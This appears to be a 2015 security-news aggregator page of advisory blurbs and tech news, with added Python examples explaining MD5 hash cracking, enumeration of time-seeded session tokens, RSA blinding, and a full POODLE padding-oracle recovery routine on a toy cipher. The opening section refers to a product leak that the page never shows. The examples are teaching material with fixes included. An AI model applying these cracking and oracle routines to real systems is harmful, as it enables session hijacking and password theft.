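Why an unsalted MD5 hash is "easily" cracked once it leaks, as an added example that is not the product's code (the wordlist and salts are constructed): with an unsalted fast hash the attacker precomputes one table and reuses it against every user's hash, while a per-user salt plus a slow key-derivation function forces a fresh, expensive search for each leaked hash.

```python
import hashlib
import hmac
import os

# Constructed wordlist; a real attacker uses a multi-million-entry list
# and runs MD5 at billions of guesses per second on commodity GPUs.
WORDLIST = ["password", "letmein", "svnadmin", "Summer2015", "changeme"]


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def build_md5_table(words):
    """Precompute hash -> word once. Nothing user-specific goes into an
    unsalted hash, so the same table cracks every user's leaked hash and
    two users with the same password are visibly identical."""
    return {md5_hex(w): w for w in words}


def crack_unsalted(leaked_hex: str, table: dict):
    """One dictionary lookup per leaked hash."""
    return table.get(leaked_hex.lower())


def salted_hash(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """What the application should store instead: per-user random salt and
    a deliberately slow KDF (PBKDF2-HMAC-SHA256 here)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_salted(target: bytes, salt: bytes, words, iterations: int = 100_000):
    """No precomputed table applies: every candidate must be re-derived with
    this user's salt at the full KDF cost, separately for each leaked hash."""
    for w in words:
        if hmac.compare_digest(salted_hash(w, salt, iterations), target):
            return w
    return None


def demo():
    """Stand-alone run: crack a leaked unsalted hash, then show the salted
    store still falls to a tiny wordlist but only by per-hash brute force."""
    table = build_md5_table(WORDLIST)
    leaked = md5_hex("Summer2015")          # what the POST response exposes
    salt = os.urandom(16)
    stored = salted_hash("Summer2015", salt)
    return crack_unsalted(leaked, table), crack_salted(stored, salt, WORDLIST)
```

The salted variant is not uncrackable for a weak password; the difference is cost and reuse. A leaked unsalted MD5 is effectively the password for anything in the attacker's wordlist, and the leak here hands it to anyone who already has a session or an XSS foothold.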

Microsec e-Szigno / Netlock Mokka XML Signature Wrapping

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Microsec e-Szigno & Netlock Mokka computer applications suffer from an e-akta signature verification weakness. Microsec e-Szigno versions older than 3.2.7.12 & Netlock Mokka versions older than 2.7.8.1204 are affected. View Source

ESRS VE 3.0x Certificate Validation / Insufficient Randomness

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Secure Remote Services (ESRS) Virtual Edition (VE) versions 3.02, 3.03, & 3.04 do not properly validate certificates. Malicious users could potentially exploit this vulnerability to spoof trusted entities by using man-in-the-middle attacks. The session cookie used by ESRS VE is generated using insufficiently random values. Malicious users could potentially exploit this vulnerability to gain unauthorized access[…]
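
The second issue, a session cookie built from insufficiently random values, is exploited by enumerating the generator's small input space rather than guessing the cookie itself. The following added example is not ESRS code; the advisory does not say how ESRS derived its cookie, so the seeding scheme (a general-purpose PRNG seeded with the login time) is an assumption chosen to show the failure mode. It shows the weak issuer, the attacker's enumeration of every token the server could have issued in a two-minute window, and the CSPRNG-based replacement:

```python
import random
import secrets
import time

TOKEN_BYTES = 16


def weak_token(seed: int) -> str:
    """Session ID drawn from a general-purpose PRNG seeded with a low-entropy
    value. Same seed, same token, so guessing the seed is the whole attack."""
    rng = random.Random(seed)
    return rng.getrandbits(TOKEN_BYTES * 8).to_bytes(TOKEN_BYTES, "big").hex()


def issue_weak_session(now=None) -> str:
    """Server side of the weak pattern (assumed scheme): the seed is the
    login time in whole seconds."""
    return weak_token(int(time.time() if now is None else now))


def strong_token() -> str:
    """What the server should do: read the OS CSPRNG directly."""
    return secrets.token_hex(TOKEN_BYTES)


def candidate_weak_tokens(approx_login_time: float, window: int = 120) -> list:
    """Attacker side: knowing roughly when a victim logged in (server Date
    header, an access log, or simply 'now'), enumerate every token the
    server could have issued within +/- window seconds. Each candidate is
    one cookie to try; 241 requests replace 2**128 guesses."""
    base = int(approx_login_time)
    return [weak_token(base + d) for d in range(-window, window + 1)]


def recover_seed(observed_token: str, approx_time: float, window: int = 120):
    """Given one observed weak token, find the seed that produced it. A hit
    both confirms the generator in use and calibrates the attacker's clock
    against the server's."""
    base = int(approx_time)
    for d in range(-window, window + 1):
        if weak_token(base + d) == observed_token:
            return base + d
    return None
```

Even with a high-entropy seed, `random.Random` is a Mersenne Twister whose internal state can be reconstructed from 624 consecutive 32-bit outputs, so the fix is the source of randomness, not a better seed. The certificate-validation half of the advisory is not shown; on the client side it reduces to never disabling chain and hostname verification for the connection to the remote service.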

Debian Security Advisory 3296-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Debian Linux Security Advisory 3296-1 – Evgeny Sidorov discovered that libcrypto++, a general purpose C++ cryptographic library, did not properly implement blinding to mask private key operations for the Rabin-Williams digital signature algorithm. This could allow remote attackers to mount a timing attack & retrieve the user’s private key. View Source
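
Blinding is the countermeasure the advisory says was missing. The following added example is not libcrypto++ code; it shows the technique on a toy RSA key rather than Rabin-Williams because the construction is the same: the private-key operation is applied to m * r^e for a fresh random r, and r is divided back out of the result, so the secret-dependent computation never runs on an attacker-chosen input. The key is far too small for any real use and exists only so the arithmetic is visible.

```python
import secrets
from math import gcd

# Toy RSA key (P, Q chosen for readability, not security). The advisory
# concerns Rabin-Williams, but blinding is applied identically there.
P, Q = 61, 53
N = P * Q                              # 3233
E = 17
D = pow(E, -1, (P - 1) * (Q - 1))      # 2753; 3-argument pow with -1 needs Python 3.8+


def private_op(x: int) -> int:
    """The secret-dependent step: x^d mod n. Its running time and memory
    access pattern vary with both x and d; that variation is what a timing
    attacker measures across many requests."""
    return pow(x, D, N)


def fresh_blinding_factor() -> int:
    """Uniform r in [2, N-1] with gcd(r, N) == 1, from the OS CSPRNG."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(m: int, r: int) -> int:
    """m * r^e mod n: looks like a random group element to private_op."""
    return (m * pow(r, E, N)) % N


def unblind(s_blind: int, r: int) -> int:
    """(m r^e)^d = m^d * r, so multiplying by r^-1 leaves m^d."""
    return (s_blind * pow(r, -1, N)) % N


def sign_unblinded(m: int) -> int:
    """The unpatched pattern: the attacker's chosen m goes straight into
    private_op, so repeated timings correlate with m and with d."""
    return private_op(m)


def sign_blinded(m: int) -> int:
    """private_op only ever sees m * r^e for a fresh r, so timing samples
    are decorrelated from the message the attacker submitted."""
    r = fresh_blinding_factor()
    return unblind(private_op(blind(m, r)), r)


def verify(m: int, s: int) -> bool:
    return pow(s, E, N) == m % N
```

Both signing functions return the same signature; the difference is only what the private-key routine was fed. A fresh r per operation is essential: a fixed or reused blinding factor turns the blinded input back into a deterministic function of the message, and the timing leak returns.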

HP Security Bulletin HPSBPI03360 2

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBPI03360 2 – A potential security vulnerability has been identified with certain HP LaserJet Printers & MFPs, certain HP OfficeJet Printers & MFPs, & certain HP JetDirect Networking cards using OpenSSL. This is the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to[…]

HP Security Bulletin HPSBPI03107 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBPI03107 1 – A potential security vulnerability has been identified with certain HP LaserJet Printers & MFPs, certain HP OfficeJet Printers & MFPs, & certain HP JetDirect Networking cards using OpenSSL. This is the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to[…]

HP Security Bulletin HPSBGN03362 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBGN03362 1 – A potential security vulnerability has been identified with HP Discovery & Dependency Mapping Inventory (DDMI). This is the TLS vulnerability in U.S. export-grade 512-bit keys in Diffie-Hellman key exchange known as “Logjam” which could be exploited remotely resulting in disclosure of information. Revision 1 of this advisory. View Source

HP Security Bulletin HPSBMU03267 3

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBMU03267 3 – Potential security vulnerabilities have been identified with the HP Matrix Operating Environment & HP CloudSystem Matrix running OpenSSL. These vulnerabilities comprise the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to allow disclosure of information. Revision 3 of this advisory.[…]
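
The three bulletins above (HPSBPI03360, HPSBPI03107 and HPSBMU03267) all concern POODLE, and the mechanism is worth seeing end to end. The following is an added toy, not HP's or OpenSSL's code: a constructed Feistel permutation stands in for the block cipher, a truncated HMAC for the SSLv3 MAC, and the record layout follows SSLv3's MAC-then-pad-then-encrypt, where the receiver checks only the padding length byte and never the filler. An attacker who can make the victim encrypt requests with a secret between chosen bytes (the usual JavaScript in the browser) and can observe whether the server accepts each record replaces the padding block with the block holding the target byte; each acceptance, roughly one in 256, reveals that byte.

```python
import hashlib
import hmac
import os

BLOCK = 16      # toy cipher block size
MAC_LEN = 16    # truncated HMAC tag stands in for SSLv3's MD5/SHA-1 MAC


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Constructed 4-round Feistel permutation on 16-byte blocks; not a real
    cipher, but CBC only needs an unknown-key permutation for the attack."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)


def sslv3_seal(enc_key: bytes, mac_key: bytes, data: bytes):
    """MAC-then-pad-then-encrypt. SSLv3 padding is pad_len filler bytes plus
    one length byte, and the spec never says what the filler must contain."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(enc_key, iv, body)


def sslv3_open(enc_key: bytes, mac_key: bytes, iv: bytes, ciphertext: bytes) -> bool:
    """Receiver. The only padding check is that the length byte is in range,
    so a swapped-in last block is accepted whenever its final decrypted byte
    happens to equal BLOCK - 1 (the MAC then covers the untouched data)."""
    if not ciphertext or len(ciphertext) % BLOCK:
        return False
    plain = cbc_decrypt(enc_key, iv, ciphertext)
    pad_len = plain[-1]
    if pad_len >= BLOCK:
        return False
    body = plain[:len(plain) - pad_len - 1]
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    expect = hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(tag, expect)


def poodle_recover(victim_send, server_accepts, secret_len: int, max_tries: int = 20000) -> bytes:
    """victim_send(prefix, suffix) -> (iv, ct): the browser encrypting a
    request with the secret between attacker-chosen bytes.
    server_accepts(iv, ct) -> bool: whether the server processed the record.
    For each byte: align it to the end of a block, force a full padding
    block, replace that padding block with the target block and wait for
    the 1-in-256 acceptance, which pins the byte down exactly."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK
        target = (prefix_len + j) // BLOCK                   # block whose last byte is secret[j]
        suffix_len = (-(prefix_len + secret_len)) % BLOCK    # data + MAC fill whole blocks
        for _ in range(max_tries):
            iv, ct = victim_send(b"A" * prefix_len, b"B" * suffix_len)
            blocks = [iv] + [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
            forged = ct[:-BLOCK] + blocks[target + 1]
            if server_accepts(iv, forged):
                # D(C_target)[-1] ^ C_{n-2}[-1] == BLOCK-1 and D(C_target) == P_target ^ C_{target-1}
                recovered.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the record layout")
    return bytes(recovered)


def make_demo(secret: bytes):
    """Victim and server sharing fresh keys around a constructed secret."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    send = lambda prefix, suffix: sslv3_seal(enc_key, mac_key, prefix + secret + suffix)
    accepts = lambda iv, ct: sslv3_open(enc_key, mac_key, iv, ct)
    return send, accepts
```

Running `send, accepts = make_demo(b"session=7f3c9a")` followed by `poodle_recover(send, accepts, 14)` returns the secret after about 256 forced requests per byte. TLS 1.0 and later check every padding byte, which is why the remediation in these bulletins is to stop offering SSLv3 at all; servers that must keep it for legacy clients should at least honour the TLS_FALLBACK_SCSV signal so that a modern client cannot be forced down to it by a connection failure.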

HP Security Bulletin HPSBUX03359 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBUX03359 1 – A potential security vulnerability has been identified with the HP-UX pppoec utility. The vulnerability could be exploited to allow a local user to elevate privileges. Revision 1 of this advisory. View Source

HP Security Bulletin HPSBGN03351 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBGN03351 1 – Potential security vulnerabilities have been identified with HP IceWall SSO Dfw, SSO Certd, MCRP, & Federation Agent running OpenSSL. This is the TLS vulnerability known as “Logjam”, which could be exploited remotely to allow disclosure of information. Revision 1 of this advisory. View Source

New Study Accuses Google of Anti-competitive Search Behavior

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Columbia Law School professor Tim Wu — the man who coined the term “network neutrality” — has published a new study suggesting that Google’s new method of putting answers to simple search queries at the top of the results page is anticompetitive & harmful to consumers. For subjective search queries —[…]

How Television Is Fighting Off the Internet

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HughPickens.com writes: Michael Wolff writes in the NY Times that online-media revolutionaries once figured they could eat TV’s lunch by stealing TV’s business model with free content supported by advertising. But online media is now drowning in free, & internet traffic has glutted the ad market, forcing down rates. Digital publishers, from The Guardian to[…]

Greek Financial Crisis Is an Opportunity For Bitcoin

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Greece’s economy has been in trouble for several years now, & a major vote next weekend will shake it up even further. The country can’t pay its debts, & the upcoming referendum will decide whether they face increased austerity measures or start the process of exiting the Euro. One side effect[…]

The Underfunded, Disorganized Plan To Save Earth From the Next Giant Asteroid

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

New submitter citadrianne sends a story about the beginnings of our asteroid defense efforts, & how initial concern over an asteroid strike wasn’t sustained long enough to establish consistent funding: Until a few decades ago, the powers that be didn’t take the threat of asteroids very seriously. This changed on March 23, 1989, when an[…]

Huawei Home Gateway HG530 / HG520b Password Disclosure / Change

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Two exploits for Huawei Home Gateway versions HG530 & HG520b that allow for password disclosure & password change. View Source

AP CS Test Takers and Pass Rates Up, Half of Kids Don’t Get Sparse Arrays At All

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

theodp writes: Each June, the College Board tweets out teasers of the fuller breakouts of its Advanced Placement (AP) test results, which aren’t made available until the fall. So, here’s a roundup of this year’s AP Computer Science tweetstorm: 1. “Wow — massive gains in AP Computer Science participation (25% growth) AND scores this year;[…]
